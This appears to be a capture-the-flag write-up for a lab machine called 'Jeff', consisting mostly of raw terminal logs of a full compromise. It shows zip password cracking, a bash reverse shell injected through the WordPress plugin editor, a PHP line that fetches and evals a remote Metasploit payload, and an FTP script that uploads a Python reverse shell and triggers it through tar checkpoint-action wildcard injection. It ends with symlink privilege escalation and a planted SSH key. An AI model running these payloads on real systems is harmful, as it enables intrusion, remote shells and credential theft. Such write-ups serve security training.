IP: 10.10.213.133

Nmap scan results:

root@LAPTOP-U5913CMD:/home/akshay/Desktop/Jeff# nmap -A -T4 10.10.213.133
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-17 12:46 IST
Nmap scan report for 10.10.213.133
Host is up (0.16s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 7e:43:5f:1e:58:a8:fc:c9:f7:fd:4b:40:0b:83:79:32 (RSA)
|   256 5c:79:92:dd:e9:d1:46:50:70:f0:34:62:26:f0:69:39 (ECDSA)
|_  256 ce:d9:82:2b:69:5f:82:d0:f5:5c:9b:3e:be:76:88:c3 (ED25519)
80/tcp open  http    nginx
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 (86%), Linux 2.6.32 - 3.1 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   169.72 ms 10.9.0.1
2   170.51 ms 10.10.213.133


root@LAPTOP-U5913CMD:/home/akshay/Desktop/Jeff# dirb http://jeff.thm/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Nov 17 12:55:24 2020
URL_BASE: http://jeff.thm/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://jeff.thm/ ----
==> DIRECTORY: http://jeff.thm/admin/                                                                                   
==> DIRECTORY: http://jeff.thm/assets/                                                                                  
==> DIRECTORY: http://jeff.thm/backups/                                                                                 
+ http://jeff.thm/index.html (CODE:200|SIZE:1178)                                                                       
==> DIRECTORY: http://jeff.thm/uploads/

As soon as I got into backups directory I guessed that it might contain backup.zip so I downloaded it.

root@LAPTOP-U5913CMD:/home/akshay/Desktop/Jeff# mv ../../Downloads/backup.zip .
root@LAPTOP-U5913CMD:/home/akshay/Desktop/Jeff# ls
backup.zip
root@LAPTOP-U5913CMD:/home/akshay/Desktop/Jeff# ls -la
total 72
drwxr-xr-x   2 root   root    4096 Nov 17 13:17 .
drwxr-xr-x 106 akshay akshay  4096 Nov 17 12:46 ..
-rw-r--r--   1 akshay akshay 62753 Nov 17 13:16 backup.zip
root@LAPTOP-U5913CMD:/home/akshay/Desktop/Jeff#


root@LAPTOP-U5913CMD:/home/akshay/Desktop/Jeff# fcrackzip -D -p /home/akshay/Downloads/rockyou.txt -u backup.zip


PASSWORD FOUND!!!!: pw == !!Burningbird!!

cat wpadmin.bak
wordpress password is: phO#g)C5dhIWZn3BKP


root@LAPTOP-U5913CMD:/home/akshay/Desktop/Jeff/backup/assets# wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.jeff.thm" --hw 12 -t 100 10.10.214.26

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.214.26/
Total requests: 4997

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                           
===================================================================

000000326:   200        346 L    1455 W   25901 Ch    "wordpress"


jeff@jeff.thm
We successfully logged in using jeff as the username and the wpadmin.bak password.

http://wordpress.jeff.thm/wp-admin/plugin-editor.php

add_action( 'admin_head', 'dolly_css' );exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.81.62/1234 0>&1'");


root@LAPTOP-U5913CMD:/home/akshay/Desktop/Jeff# nc -nvlp 1234
Listening on 0.0.0.0 1234

Connection received on 10.10.231.20 51588
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Jeff:/var/www/html/wp-admin$
www-data@Jeff:/var/www/html/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Jeff:/var/www/html/wp-admin$


Database password:

cat ftp_backup.php
<?php
/*
    Todo: I need to finish coding this database backup script.
          also maybe convert it to a wordpress plugin in the future.
*/
$dbFile = 'db_backup/backup.sql';
$ftpFile = 'backup.sql';

$username = "backupmgr";
$password = "SuperS1ckP4ssw0rd123!";


php -d allow_url_fopen=true -r "eval(file_get_contents('http://10.9.81.62:8080/XXpgfWKrzfv4n', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
msf6 exploit(multi/script/web_delivery) > [*] 10.10.231.20     web_delivery - Delivering Payload (1111 bytes)
[*] Sending stage (39282 bytes) to 10.10.231.20
[*] Meterpreter session 1 opened (10.9.81.62:4444 -> 10.10.231.20:49136) at 2020-11-17 15:46:30 +0530

msf6 exploit(multi/script/web_delivery) > sessions -t

Active sessions
===============

  Id  Name  Type                   Information           Connection
  --  ----  ----                   -----------           ----------
  1         meterpreter php/linux  www-data (33) @ Jeff  10.9.81.62:4444 -> 10.10.231.20:49136 (10.10.231.20)

msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : Jeff
OS          : Linux Jeff 4.15.0-101-generic #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020 x86_64
Meterpreter : php/linux
meterpreter > shell
Process 179 created.
Channel 0 created.


#!/usr/bin/env python3.7
from ftplib import FTP
import io

host = '172.20.0.1'
username = "backupmgr"
password = "SuperS1ckP4ssw0rd123!"

ftp = FTP(host = host)
login_status = ftp.login(user = username,passwd = password)
print(login_status)
ftp.set_pasv(False)
ftp.cwd('files')
print(ftp.dir())

shell = io.BytesIO(b'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.81.62",1222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);')
trash = io.BytesIO(b'')

ftp.storlines('STOR shell.sh',shell)
ftp.storlines('STOR --checkpoint=1',trash)
ftp.storlines('STOR --checkpoint-action=exec=sh shell.sh,trash)
ftp.dir()

ftp.quit()







root@LAPTOP-U5913CMD:/home/akshay/Desktop/Jeff# nc -nvlp 444
Listening on 0.0.0.0 444
Connection received on 10.10.13.169 41264
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(backupmgr) gid=1001(backupmgr) groups=1001(backupmgr)
$ python3 -c "import pty;pty.spawn('/bin/bash')"
backupmgr@tryharder:~/.ftp/files$ id
id
uid=1001(backupmgr) gid=1001(backupmgr) groups=1001(backupmgr)
backupmgr@tryharder:~/.ftp/files$

It is opening message.txt and reading out the lines.
SO instead we can link the message.txt to /var/backups.jeff.bak to it and it will display us the password for jeff.



backupmgr@tryharder:/opt/systools$ ln -s /var/backups/jeff.bak message.txt
ln -s /var/backups/jeff.bak message.txt
backupmgr@tryharder:/opt/systools$ ls -la
ls -la
total 28
drwxrwxrwx 2 jeff      jeff       4096 Nov 17 11:34 .
drwxr-xr-x 4 root      root       4096 May 24 13:13 ..
lrwxrwxrwx 1 backupmgr backupmgr    21 Nov 17 11:34 message.txt -> /var/backups/jeff.bak
-rwxr-sr-x 1 jeff      pwman     17160 May 24 13:18 systool
backupmgr@tryharder:/opt/systools$ cat message.txt
cat message.txt
cat: message.txt: Permission denied
backupmgr@tryharder:/opt/systools$ ./systool
./systool
Welcome to Jeffs System Administration tool.
This is still a very beta version and some things are not implemented yet.
Please Select an option from below.
1 ) View process information.
2 ) Restore your password.
3 ) Exit
Chose your option: 2
2


Your Password is: 123-My-N4M3-1z-J3ff-123


1 ) View process information.
2 ) Restore your password.
3 ) Exit


backupmgr@tryharder:/opt/systools$ su jeff
su jeff
Password: 123-My-N4M3-1z-J3ff-123

jeff@tryharder:/opt/systools$ id
id
uid=1000(jeff) gid=1000(jeff) groups=1000(jeff),1002(pwman)
jeff@tryharder:/opt/systools$


>>> from hashlib import md5
>>> password = "HashMeLikeOneOfYourFrenchGirls"
>>> password = md5(password.encode()).hexdigest()
>>> password
'e122d5588956ef9ba7d4d2b2fee00cac'


jeff@tryharder:~$ mkdir .ssh
mkdir .ssh
jeff@tryharder:~$ cd .ssh
cd .ssh
jeff@tryharder:~/.ssh$ touch authorized_keys
touch authorized_keys
jeff@tryharder:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDqs85VzmP9T/JRNSOv9D0N7EwJHLjQqq+KluZ+jnECjyVDPAnbaJaJNEuz+6/fnKU1ThYnAqbP3Asuyiob9LJVg4hhjO1IMqXJlZ97tDe6AM79zkVlpjSgydBTC9Mpqpk6F5Xq/xoYOlBHZ5lFXcT6yB/EnBC6pdKW9xuoDPDD7/Z62IUfsRZ0W/jAKLzoWV8hNi0ZEJm5lahJ6sRxydcauMyMRGmlyjth/MW2fr6VfsZQ6FM5QBFwYYPsyVyc065UQV02NNtXeZhNcOI8QjTB3gIzdi91+P97eRRlpv4sHq/geOYEuSyzm9mkb3OHN7n/M7u+j5XupRHRHfDRdg0X8Dj/niXu8v4WSmAschDYWX2PydNfDz2YBrQy4eFDg4RHG0peJu0dTqDIntA4s98cfnAm/yeEjBEi4AeC8WSH1DZJ3Xrg019gDIhyOh8BGgZmC3DyiRvgE1j92GcM2ivU0zq+CGmCvzLry9eYf1+KoXPuSnYNGr2TPONyJ+jl4bk= root@LAPTOP-U5913CMD" > authorized_keys
<ONyJ+jl4bk= root@LAPTOP-U5913CMD" > authorized_keys
jeff@tryharder:~/.ssh$ cat auth
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDqs85VzmP9T/JRNSOv9D0N7EwJHLjQqq+KluZ+jnECjyVDPAnbaJaJNEuz+6/fnKU1ThYnAqbP3Asuyiob9LJVg4hhjO1IMqXJlZ97tDe6AM79zkVlpjSgydBTC9Mpqpk6F5Xq/xoYOlBHZ5lFXcT6yB/EnBC6pdKW9xuoDPDD7/Z62IUfsRZ0W/jAKLzoWV8hNi0ZEJm5lahJ6sRxydcauMyMRGmlyjth/MW2fr6VfsZQ6FM5QBFwYYPsyVyc065UQV02NNtXeZhNcOI8QjTB3gIzdi91+P97eRRlpv4sHq/geOYEuSyzm9mkb3OHN7n/M7u+j5XupRHRHfDRdg0X8Dj/niXu8v4WSmAschDYWX2PydNfDz2YBrQy4eFDg4RHG0peJu0dTqDIntA4s98cfnAm/yeEjBEi4AeC8WSH1DZJ3Xrg019gDIhyOh8BGgZmC3DyiRvgE1j92GcM2ivU0zq+CGmCvzLry9eYf1+KoXPuSnYNGr2TPONyJ+jl4bk= root@LAPTOP-U5913CMD
